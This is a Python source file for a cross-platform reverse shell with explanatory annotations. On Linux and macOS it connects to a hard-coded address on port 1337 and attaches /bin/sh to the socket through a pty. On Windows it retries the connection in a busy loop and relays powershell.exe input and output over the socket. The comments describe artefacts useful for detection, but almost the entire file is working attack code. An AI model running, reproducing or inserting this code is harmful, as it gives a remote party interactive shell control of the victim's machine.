# Reverse-shell connector: on start the script opens an outbound TCP
# connection to the hard-coded peer below and attaches an interactive shell
# to that socket. Observable artefacts for detection: the outbound connection
# to 192.168.88.2:1337; on POSIX a python process whose fds 0/1/2 are the
# socket and a pty-spawned /bin/sh child; on Windows a powershell.exe child
# of python with fully piped stdio and a busy reconnect loop until connected.
RHOST = "192.168.88.2"  # NOTE: never referenced — both branches repeat the literal
RPORT = 1337            # NOTE: never referenced — both branches repeat the literal


from sys import platform


if platform != 'win32':
    import threading
    import socket
    import pty
    import os


    def connect_and_spawn_shell():
        """Connect to 192.168.88.2:1337 and run /bin/sh with its stdio on the socket.

        The socket's descriptor is duplicated onto fds 0, 1 and 2 of *this*
        process, so the shell spawned through a pty inherits the socket as its
        terminal. Returns nothing; pty.spawn blocks until the shell exits.
        There is no error handling: a failed connect raises inside the thread.
        """
        s = socket.socket()
        s.connect(("192.168.88.2", 1337))
        # Comprehension used only for its side effect (dup2 onto fds 0-2);
        # the resulting list is discarded.
        [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
        pty.spawn("/bin/sh")


    # Non-daemon thread: the interpreter stays alive until the shell exits.
    threading.Thread(target=connect_and_spawn_shell).start()
else:
    import os          # NOTE: unused in this branch
    import socket
    import subprocess
    import threading
    import sys         # NOTE: unused in this branch


    def send_to_process(s, p):
        """Forward data received on socket *s* to the stdin of process *p*.

        Loops forever. Each 1024-byte recv is decoded with the default codec
        and written to the text-mode stdin pipe, then flushed. No exit
        condition: once the peer closes the socket, recv returns b"" and the
        loop keeps writing empty strings.
        """
        while True:
            p.stdin.write(s.recv(1024).decode())
            p.stdin.flush()


    def receive_from_process(s, p):
        """Relay the combined stdout/stderr of process *p* to socket *s*.

        Reads one character at a time from the text-mode pipe, encodes it and
        sends it. Loops forever; after the process exits read(1) returns ""
        and the loop keeps sending empty payloads.
        """
        while True:
            s.send(p.stdout.read(1).encode())


    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


    # Busy reconnect loop: the bare `except: pass` swallows every exception
    # (including KeyboardInterrupt) and retries immediately with no delay
    # until the connect succeeds.
    while True:
        try:
            s.connect(("192.168.88.2", 1337))
            break
        except:
            pass


    # Child shell with all three streams piped; stderr is merged into stdout
    # so receive_from_process sees both. `shell=True` is redundant with an
    # explicit argv list and additionally routes the command through cmd.exe.
    p = subprocess.Popen(["powershell.exe"],
                         stdout=subprocess.PIPE,
                         stderr=subprocess.STDOUT,
                         stdin=subprocess.PIPE,
                         shell=True,
                         text=True)


    # Both relay threads are daemons, so the process exits as soon as
    # p.wait() returns (i.e. when powershell.exe terminates).
    threading.Thread(target=send_to_process, args=[s, p], daemon=True).start()
    threading.Thread(target=receive_from_process, args=[s, p], daemon=True).start()
    p.wait()
|
|